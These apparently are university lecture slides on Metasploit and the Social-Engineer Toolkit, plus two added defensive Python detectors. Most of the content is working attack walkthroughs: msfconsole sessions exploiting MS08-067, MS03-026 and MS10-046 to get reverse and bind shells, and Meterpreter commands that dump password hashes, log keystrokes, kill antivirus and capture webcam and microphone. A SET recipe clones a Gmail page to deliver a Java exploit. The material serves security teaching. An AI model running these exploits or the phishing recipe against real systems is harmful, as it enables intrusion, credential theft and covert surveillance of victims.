
Network Security Metasploit

Osman SALEM, Maître de Conférences


Using any unauthorized tools will get you fired/arrested/deported/smited by God, etc. This course is not intended to make you a cracker

Just a small hacker who understands the importance of patches

You alone are responsible for any misuse of these tools


Once on a network, how do you find a vulnerability?

Vulnerability scanner tools
System penetration through vulnerability exploitation

How do you get access?

Target weak servers first to test boxes
Less likely to be patched

Get access to:

Steal passwords
Set up relays
etc.

So, what is the Metasploit Framework? What is it capable of providing?

Many Attack Vectors!

Gaining access to a secured system is a difficult task

requires skill and maybe luck

However, the most dangerous and very effective attacks used by malicious users today are

Software exploitation attacks!
Social engineering attacks!

Software exploitation attacks can be used to gain access to unauthorized systems:

Installation of malicious software (Spyware, Viruses, Trojans, Adware, etc.)


Understanding S.E. (Software Exploitation) Attacks

First, let's understand the basics

The word vulnerability, in computer security, refers to a weakness in a system allowing an attacker to violate the confidentiality, integrity, availability, access control, consistency or audit mechanisms of the system or the data and applications it hosts

To software developers, a bug is synonymous with a vulnerability

Ex: errors in a program's source code or flawed program design

Buffer overflows
Memory leaks
Deadlocks
Arithmetic overflow
Accessing protected memory (Access Violation)
etc.

Exploitation: Exploits

Regardless of the type of software bug we are speaking of, an exploit:

Triggers an unexpected condition in the program, generating an event that the program is not designed to recover from successfully
Redirects execution in a controlled way to run the payload
The payload is a sequence of code that is executed when the vulnerability is triggered

To make things clear, an exploit is really broken up into two parts: EXPLOIT = Vulnerability + Payload

Understanding Payloads

The payload is usually written in Assembly Language
Platform and OS dependent: a Win32 payload will not work on Linux (even if we are exploiting the same bug)

Different payload types exist and they accomplish different tasks:

exec: execute a command or program on the remote system
download_exec: download a file from a URL and execute it
upload_exec: upload a local file and execute it
adduser: add a user to the system accounts

The most common payload: a shell
Unix: /bin/sh
Windows: command prompt cmd.exe

Two different types of shell payloads: bind shells and reverse shells
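As an added example (not part of the slides or of Metasploit), the difference between the two shell types as a defender sees it on the wire: with a bind shell (windows/shell/bind_tcp) the payload listens on the victim and the attacker connects in, while with a reverse shell (windows/shell/reverse_tcp) the victim connects out to the attacker's LHOST. The connection records, the victim address, the 60-second window and port 4444 in the sample are constructed assumptions.

```python
# Added example, not from the slides: correlate connection records to tell a
# bind-shell pattern from a reverse-shell pattern following SMB contact.
# The records, VICTIM address, WINDOW and the port 4444 in the sample are
# constructed assumptions, not values from the course.
from typing import List, Tuple

# (timestamp in seconds, src_ip, src_port, dst_ip, dst_port)
Record = Tuple[int, str, int, str, int]

VICTIM = "10.0.0.5"   # constructed: the monitored Windows host
SMB_PORT = 445        # service exploited by ms08_067_netapi
WINDOW = 60           # assumed: max seconds between SMB contact and the shell connection

def shell_patterns(records: List[Record]) -> List[Tuple[str, str, int]]:
    """Return (pattern, peer_ip, timestamp) for follow-on connections that look like a shell."""
    smb_contacts = [(ts, src) for ts, src, _, dst, dport in records
                    if dst == VICTIM and dport == SMB_PORT]
    findings: List[Tuple[str, str, int]] = []
    for ts, src, _, dst, dport in records:
        for smb_ts, peer in smb_contacts:
            if not (smb_ts < ts <= smb_ts + WINDOW):
                continue
            if src == peer and dst == VICTIM and dport != SMB_PORT:
                # Same peer now connects to a new, non-SMB port on the victim: bind shell
                finding = ("bind_shell", peer, ts)
            elif src == VICTIM and dst == peer:
                # The victim opens a connection back to the peer: reverse shell
                finding = ("reverse_shell", peer, ts)
            else:
                continue
            if finding not in findings:
                findings.append(finding)
    return findings

SAMPLE: List[Record] = [  # constructed records
    (100, "192.0.2.10", 51000, "10.0.0.5", 445),   # SMB contact from peer A
    (103, "192.0.2.10", 51001, "10.0.0.5", 4444),  # peer A connects to the bind handler
    (200, "192.0.2.20", 51500, "10.0.0.5", 445),   # SMB contact from peer B
    (202, "10.0.0.5", 49152, "192.0.2.20", 4444),  # victim calls back to peer B (LHOST)
    (900, "10.0.0.7", 40000, "10.0.0.5", 445),     # ordinary SMB use, no follow-on
]

if __name__ == "__main__":
    for pattern, peer, ts in shell_patterns(SAMPLE):
        print(f"t={ts}: {pattern} involving {peer}")
```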

Auxiliaries & encoders

Auxiliaries: scanning, sniffing, fingerprinting, etc.

Encoders: evade detection by antivirus, firewall, IDS, IPS, etc. by encoding the payload during the penetration operation

Metasploit Framework

What is the Metasploit Framework?

The Metasploit Framework is a platform for writing, testing, and using exploit code.

Provides a simplified method for launching dangerous attacks

Set of exploits to launch against a box
Potentially own the box
Build a real exploit for your own purposes

General interface for testing & writing exploits
Will not make you a cracker

msfconsole: the most efficient, powerful, all-in-one centralized frontend interface for penetration testers to use Metasploit

$ cd /pentest/exploits/framework/
$ ./msfconsole
msf > help
msf > show exploits
msf > show payloads
msf > show encoders
msf > show -h



$ ./msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST

msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/bind_tcp

PAYLOAD => windows/shell/bind_tcp

msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (240 bytes) to
[*] Command shell session 1 opened ( -> at Sat Nov 13 19:01:23 +0000 2010
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>



Exploitation with Metasploit: getting a shell

Exploitation with Meterpreter

Meterpreter can take many actions:

Upload/download files
Read/write to the registry
Change file access times
Execute programs


Exploitation: Exploits

Modern exploits work best

ms08-067, October 2008 (1/3 of machines still vulnerable)
ms03-026, September 2003, used by MS Blaster
ms04-011, April 2004, used by Sasser



$ ./msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST

msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp

PAYLOAD => windows/shell/reverse_tcp

msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set LHOST

msf exploit(ms08_067_netapi) > exploit

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>

Try the payload: set PAYLOAD windows/vncinject/reverse_tcp

set RHOST & set LHOST



$ ./msfconsole
msf > use exploit/windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > show options
msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms03_026_dcom) > set LHOST
msf exploit(ms03_026_dcom) > set RHOST
msf exploit(ms03_026_dcom) > exploit



$ ./msfconsole
msf > use exploit/windows/browser/ms10_046_icon_dllloader
msf exploit(ms10_046_icon_dllloader) > show options
msf exploit(ms10_046_icon_dllloader) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms10_046_icon_dllloader) > set LHOST
msf exploit(ms10_046_icon_dllloader) > exploit

In the victim's browser, enter the IP address of the attacker



msf > use exploit/windows/smb/ms10_061_spoolss
msf exploit(ms10_061_spoolss) > show payloads
msf exploit(ms10_061_spoolss) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms10_061_spoolss) > set LHOST [MY IP ADDRESS]
msf exploit(ms10_061_spoolss) > set RHOST [TARGET IP]
msf exploit(ms10_061_spoolss) > exploit



Information gathering

nslookup
> set type=mx

whois -h 193.48.xx.YY
Netcraft

nmap -sS -Pn
nmap -sS -Pn -A

TCP idle scan

msf > use auxiliary/scanner/ip/ipidseq
msf auxiliary(ipidseq) > show options
msf auxiliary(ipidseq) > set RHOSTS
msf auxiliary(ipidseq) > set THREADS 50
msf auxiliary(ipidseq) > run
msf auxiliary(ipidseq) > nmap -PN -sI
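As an added example (not from the slides), the classification an ipidseq check applies to a host's observed IP ID values, written here so a defender can test IP IDs captured from their own hosts: a host classed "Incremental" has a predictable IP ID, which is the property an idle scan relies on, so such hosts should be hardened. The thresholds and sample captures are assumptions, modelled loosely on nmap's sequence classes.

```python
# Added example, not from the slides: classify a host's observed IP ID values
# the way an ipidseq / idle-scan check does, as a defender-side check of one's
# own hosts. Thresholds are assumptions modelled loosely on nmap's classes.
from typing import List

MAX_STEP = 5  # assumed: per-packet increments above this are not "incremental"

def _diffs(values: List[int]) -> List[int]:
    """Consecutive differences modulo 2^16, so a wrap from 65535 to 0 counts as +1."""
    return [(b - a) % 0x10000 for a, b in zip(values, values[1:])]

def _byteswap(value: int) -> int:
    """Swap the two bytes of a 16-bit IP ID (for hosts that emit little-endian IDs)."""
    return ((value & 0xFF) << 8) | (value >> 8)

def ipid_class(ids: List[int]) -> str:
    """Return a label for a sequence of 16-bit IP IDs observed from one host."""
    if len(ids) < 2:
        return "Unknown"
    if all(i == 0 for i in ids):
        return "All zeros"
    diffs = _diffs(ids)
    if all(d == 0 for d in diffs):
        return "Constant"
    if all(1 <= d <= MAX_STEP for d in diffs):
        return "Incremental"
    swapped_diffs = _diffs([_byteswap(i) for i in ids])
    if all(1 <= d <= MAX_STEP for d in swapped_diffs):
        return "Broken little-endian incremental"
    return "Randomized"

def idle_scan_risk(ids: List[int]) -> bool:
    """True when the host's IP ID is predictable enough to serve as an idle-scan zombie."""
    return ipid_class(ids) in ("Incremental", "Broken little-endian incremental")

# Constructed sample captures (not real hosts)
SAMPLES = {
    "legacy_host": [65533, 65534, 65535, 0, 1, 2],     # increments by 1 across the wrap
    "swapped_host": [0x0100, 0x0200, 0x0300, 0x0400],  # 1,2,3,4 sent little-endian
    "hardened_host": [17234, 60211, 2897, 41008],      # randomized
    "zero_host": [0, 0, 0, 0],
}

if __name__ == "__main__":
    for name, ids in SAMPLES.items():
        print(f"{name}: {ipid_class(ids)} (idle-scan zombie risk: {idle_scan_risk(ids)})")
```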


Exploitation: Meterpreter

A Metasploit payload
Injects itself into the target process as a .dll
To cover your tracks




msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST

msf exploit(ms08_067_netapi) > show payloads
...
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(ms08_067_netapi) > show options
...
msf exploit(ms08_067_netapi) > set LHOST

msf exploit(ms08_067_netapi) > exploit

[*] Meterpreter session 1 opened ( ->

meterpreter > help
meterpreter > getuid
meterpreter > sysinfo



meterpreter > run hashdump
meterpreter > ps
meterpreter > migrate 3172
meterpreter > getpid
meterpreter > getuid
meterpreter > use priv    (to enable keystroke capture, you must load the priv extension)
meterpreter > keyscan_start    (keystroke capture)
meterpreter > keyscan_dump
meterpreter > keyscan_stop
meterpreter > screenshot
meterpreter > shell
meterpreter > run vnc
meterpreter > run killav    (to kill the antivirus)



Exploitation: Meterpreter

Acts as an ordinary payload


SET: Social-Engineer Toolkit

SET uses Metasploit

There is a "social engineering" aspect in most hacking: tricking a user into making a mistake that lets you in

Clicking a link
Ignoring an error message
Opening an attachment
etc.

Today's Attack

Target: Win 7
Vuln: Java 0-Day

Attacker: Evil Web Server with Cloned Gmail Page
Java Exploit Code Added to Web Page
Target Using Gmail


Social Engineering

cd /pentest/exploits/SET
./set
Enter option 1: Social Engineering Attacks
Enter option 2: Website Attack Vectors
Enter option 1: The Java Attack Method
Enter option 2: Site Cloner
Enter the URL
It asks you "What payload do you want to generate:" and lists 11 choices. Press Enter for the default: 2. (Windows Reverse_TCP Meterpreter)
It shows a list of 16 encodings to try and bypass AV. Press Enter for the default
It asks you to "Enter the PORT of the listener (enter for default):". Press Enter for the default
It asks you whether you want to create a Linux/OSX reverse_tcp payload. Enter no
It now shows blue text saying:
[*] Launching MSF Listener...
[*] This may take a few to load MSF...

Wait... When it's done, you will see a whole screen scroll by as Metasploit launches, ending with this message:
msf exploit(handler) >



The target is now owned. We can:

Capture screenshots
Capture keystrokes
Turn on the microphone and listen
Turn on the webcam and take a photo
Steal password hashes
etc.

Fun & Games

To remotely control the target, commands to try:

sessions -i 1
screenshot
keyscan_start
keyscan_stop
record_mic 10
webcam_list
webcam_snap 1

The Usual Stuff

This stuff is all helpful:

Get antivirus
Install patches (when they exist)
Keep image-based backups so you can recover after an infection

But none of it can really save you

Attack > Defense

Even corporate desktop computers are infected
The Chinese got into Google and >30 other huge companies last year
Don't imagine you are immune